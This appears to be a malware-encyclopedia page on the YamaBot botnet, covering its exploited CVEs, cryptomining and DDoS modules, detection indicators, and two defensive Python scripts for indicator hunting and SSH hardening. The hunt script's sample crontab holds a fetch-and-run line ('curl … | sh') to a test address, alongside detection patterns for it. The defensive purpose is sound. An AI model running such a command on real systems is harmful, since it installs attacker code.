YamaBot
⚠️ Overview
YamaBot is a Golang-based botnet first identified in February 2022 by Lumen Technologies’ Black Lotus Labs. It primarily targets Linux servers and Internet of Things (IoT) devices and has not been attributed to a named threat group. It is classed as Botnet, Cryptominer and DDoS malware: its plugin modules hijack CPU time for cryptocurrency mining and launch distributed denial-of-service attacks.
🔧 Technical Capabilities
YamaBot propagates by scanning for vulnerable services, notably exploiting CVE-2022-26134 (Atlassian Confluence OGNL injection, unauthenticated remote code execution) and CVE-2022-22954 (VMware Workspace ONE Access server-side template injection leading to remote code execution), and by brute-forcing SSH credentials. Its command-and-control (C2) traffic is HTTP/HTTPS to domains produced by a domain generation algorithm (DGA), so taking down any single domain does not sever control. The malware persists via cron jobs and loads payloads through a plugin architecture: a Monero cryptominer (XMRig) and a DDoS module supporting HTTP, TCP and UDP floods. Evasion techniques include UPX packing, process-name spoofing (for example, posing as a systemd component), and anti-debugging checks that make the process exit when it detects a tracer or debugger such as strace or gdb.
📜 History & Notable Incidents
First observed in early 2022, YamaBot’s initial campaigns targeted misconfigured Linux servers and internet-exposed Confluence instances. In mid-2022, Black Lotus Labs reported a surge in infections through the VMware vulnerability, with thousands of IP addresses observed in the botnet. No high-profile victims or law-enforcement actions have been publicly documented to date. The malware has not been associated with ransomware, but its cryptomining has caused significant resource drain on compromised cloud hosts.
🔍 Detection Indicators
Network IoCs include the User-Agent string “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36” in C2 requests, and HTTPS connections to DGA-generated domains under the .xyz and .top TLDs. Note that this User-Agent is a stock Chrome 90 string, so on its own it is a weak indicator; treat it as corroboration on a server that should not be making browser-like outbound requests at all. File-based indicators include a binary named “yamabot” or “systemd-utils” in /tmp or /var/tmp, and persistence artifacts include cron entries that download and execute payloads from remote URLs. Behavioral signatures include sustained high CPU usage from the XMRig process and outbound connections to port 14444 (a common Monero stratum pool port) and to ports 80/443 for C2.
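The indicators above as a hunt script. This is an added example written for this page, not code from Black Lotus Labs or any YamaBot report: the indicator values (User-Agent, TLDs, file names, drop directories, port 14444) come from the section above, while the log line formats, hostnames, IP addresses, process listing, cron lines and the scoring in `triage` are constructed for the example.

```python
"""Hunt for the YamaBot indicators above in constructed proxy, connection,
process and cron data. Indicator values are the page's; log formats, hosts,
addresses and the scoring heuristic are this example's own."""
import math
import re
from collections import Counter

YAMABOT_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36")
SUSPECT_TLDS = {"xyz", "top"}
SUSPECT_NAMES = {"yamabot", "systemd-utils", "xmrig"}
DROP_DIRS = ("/tmp/", "/var/tmp/")
MINING_PORTS = {14444}
PROXY_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
REMOTE_FETCH_RE = re.compile(r"\b(curl|wget)\b.*https?://")

# Constructed sample data: TEST-NET addresses and made-up hostnames.
PROXY_LOG = """\
10.0.0.5 GET https://www.example.com/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0"
10.0.0.7 POST https://kq3x9vmz2pl1.xyz/api/beacon 200 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
10.0.0.9 GET https://docs.example.top/ 200 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
"""
CONN_LOG = "10.0.0.7 203.0.113.10 14444\n10.0.0.7 203.0.113.10 443\n10.0.0.5 198.51.100.20 443\n"
PS_OUTPUT = """\
1 root /sbin/init
812 www-data /usr/sbin/apache2 -k start
4321 root /tmp/systemd-utils
4322 root /var/tmp/.x/xmrig -o 203.0.113.10:14444
"""
CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://203.0.113.10/x.sh | sh
"""

def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def is_dga_like(domain, min_len=10, min_entropy=3.0):
    """Heuristic: long, high-entropy second-level label under .xyz/.top.
    Tune against your DNS baseline; on its own this yields false positives."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2 or labels[-1] not in SUSPECT_TLDS:
        return False
    sld = labels[-2]
    return len(sld) >= min_len and shannon_entropy(sld) >= min_entropy

def proxy_findings(log_text):
    """Lines: '<client> <method> <url> <status> "<user-agent>"' -> (client, host, signals)."""
    out = []
    for line in log_text.splitlines():
        m = PROXY_RE.match(line)
        if not m:
            continue
        client, _, url, _, ua = m.groups()
        host = url.split("://", 1)[-1].split("/", 1)[0]
        signals = []
        if ua == YAMABOT_UA:  # stock Chrome 90 UA: weak alone, corroborating with others
            signals.append("yamabot-ua")
        if is_dga_like(host):
            signals.append("dga-like-domain")
        if signals:
            out.append((client, host, signals))
    return out

def connection_findings(conn_text):
    """Lines: '<src> <dst> <dport>' (e.g. from ss/conntrack); keep mining-pool ports."""
    rows = (l.split() for l in conn_text.splitlines() if l.strip())
    return [(s, d, int(p)) for s, d, p in rows if int(p) in MINING_PORTS]

def process_findings(ps_text):
    """Lines: '<pid> <user> <cmdline>'; flag known names or anything run from a drop dir."""
    out = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        exe = cmd.split()[0]
        if exe.startswith(DROP_DIRS) or exe.rsplit("/", 1)[-1] in SUSPECT_NAMES:
            out.append((int(pid), user, exe))
    return out

def cron_findings(crontab_text):
    """Cron entries that fetch and run content from a remote URL."""
    return [l for l in crontab_text.splitlines()
            if l.strip() and not l.startswith("#") and REMOTE_FETCH_RE.search(l)]

def triage(proxy, conns, procs, crons):
    """One indicator class alone is 'low'; two or more independent classes are 'high'."""
    classes = {sig for _, _, sigs in proxy for sig in sigs}
    classes |= {name for name, hits in
                (("mining-port", conns), ("dropped-binary", procs), ("cron-persistence", crons)) if hits}
    return "high" if len(classes) >= 2 else "low" if classes else "none"
```

To run this against real data, replace the constructed strings with exported proxy logs, `ss -ntp` or conntrack output, `ps -eo pid,user,args` and the contents of the system and per-user crontabs. The verdict is deliberately conservative: the User-Agent is a legitimate Chrome string and .xyz/.top host plenty of benign sites, so a host is rated "high" only when independent indicator classes (a C2-looking request, a mining-port connection, a binary in a drop directory, a remote-fetching cron job) coincide.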
☠️ Risk & Impact
YamaBot’s primary impact is financial: unauthorized cryptocurrency mining consumes CPU time and electricity on compromised systems, and on metered cloud hosts that shows up directly in the bill. Its DDoS module also threatens network availability; the cloud-hosting and education sectors are frequently hit because of exposed Confluence instances and weak SSH passwords. Data exfiltration is not a core capability, so it ranks lower as a data-breach threat. Even so, every infected host was reached through remote code execution or a guessed SSH password, and that same access could be reused, so an infection should still be handled as a full host compromise rather than just a miner clean-up.
🛡️ Mitigation
Defenders should patch CVE-2022-26134 and CVE-2022-22954 immediately (and avoid exposing Confluence or Workspace ONE Access directly to the internet), enforce key-based SSH authentication, and disable SSH root login. Patching closes the entry point but does not evict an existing infection, so patched hosts should also be checked for the indicators above. On the network, alert on DNS lookups for DGA-like domains and on unexpected outbound connections to mining pools; on hosts, use YARA rules that match the Go binary, and block known cryptominer domains. Regular audits for unauthorized cron jobs and unusual processes (especially binaries running from /tmp or /var/tmp) are also recommended.
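The two SSH hardening steps above (key-only authentication, no root login) as an auditor and fixer for sshd_config. This is an added example for this page, not a tool from the page's sources; the sshd_config snippets are constructed, and the option names, compiled-in defaults and first-match-wins rule are those of OpenSSH. The point it makes that a quick runbook misses: sshd uses the first value given for an option, so appending `PasswordAuthentication no` to the bottom of a file that already says `yes` changes nothing, and a `Match` block only applies to the connections it matches.

```python
"""Audit and fix the sshd settings recommended above (key-only authentication,
no root login). Added example with constructed sshd_config snippets. It follows
sshd's rule that the FIRST value given for an option wins, which is why appending
a hardening line to the end of the file does not override an earlier weak one."""
import re

# option (lower-case) -> acceptable values
REQUIRED = {
    "permitrootlogin": {"no"},              # "prohibit-password" would still admit root with a key
    "passwordauthentication": {"no"},
    "kbdinteractiveauthentication": {"no"}, # PAM password prompts go through this path
    "pubkeyauthentication": {"yes"},
}
CANONICAL = {"permitrootlogin": "PermitRootLogin", "passwordauthentication": "PasswordAuthentication",
             "kbdinteractiveauthentication": "KbdInteractiveAuthentication",
             "pubkeyauthentication": "PubkeyAuthentication"}
# sshd's compiled-in defaults (OpenSSH 7.0+) when the option is absent
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
            "kbdinteractiveauthentication": "yes", "pubkeyauthentication": "yes"}
# legacy spelling that sshd treats as an alias
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}

WEAK_CONFIG = """\
# constructed: distro-default style config with the weak settings
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication yes
UsePAM yes
"""
# The common mistake: append the fix at the bottom. The earlier 'yes' lines still win.
APPENDED_CONFIG = WEAK_CONFIG + "PasswordAuthentication no\nPermitRootLogin no\n"
# A Match block only applies to matching connections; it is not a global fix.
MATCH_CONFIG = "PasswordAuthentication yes\nMatch User deploy\n    PasswordAuthentication no\n"

def parse_line(raw):
    """(option, value) for one line, or (None, None) for blank/comment lines.
    Accepts 'Key value' and 'Key=value'; maps legacy aliases to the current name."""
    line = raw.split("#", 1)[0].strip()
    m = re.match(r"^([A-Za-z]+)\s*=?\s*(.*)$", line)
    if not m or not m.group(2):
        return None, None
    key = m.group(1).lower()
    return ALIASES.get(key, key), m.group(2).strip()

def parse_sshd_config(text):
    """Global settings only: first occurrence wins, and parsing stops at the
    first Match block (conditional overrides need a separate audit)."""
    settings = {}
    for raw in text.splitlines():
        key, value = parse_line(raw)
        if key == "match":
            break
        if key is not None:
            settings.setdefault(key, value)
    return settings

def audit_sshd(text):
    """(Option, effective value, required value) for each weak or missing setting."""
    cfg = parse_sshd_config(text)
    return [(CANONICAL[o], cfg.get(o, DEFAULTS[o]), sorted(ok)[0])
            for o, ok in REQUIRED.items() if cfg.get(o, DEFAULTS[o]).lower() not in ok]

def remediate(text):
    """Rewrite every global occurrence of a required option in place (so no weak
    copy is left to win) and insert missing options before the first Match block."""
    out, seen, match_at = [], set(), None
    for raw in text.splitlines():
        key, _ = parse_line(raw)
        if key == "match" and match_at is None:
            match_at = len(out)
        if key in REQUIRED and match_at is None:
            out.append(f"{CANONICAL[key]} {sorted(REQUIRED[key])[0]}")
            seen.add(key)
        else:
            out.append(raw)
    missing = [f"{CANONICAL[k]} {sorted(v)[0]}" for k, v in REQUIRED.items() if k not in seen]
    at = len(out) if match_at is None else match_at
    out[at:at] = missing
    return "\n".join(out) + "\n"
```

Use `audit_sshd(open("/etc/ssh/sshd_config").read())` to list what is still weak, and `remediate` to produce the corrected file; apply it with `sshd -t -f <file>` before reloading so a typo cannot lock you out. Files pulled in via `Include` (Debian and Ubuntu ship `/etc/ssh/sshd_config.d/`) are parsed by sshd at the point of the `Include` line, so they must be audited in that order too, which this example does not do.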
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.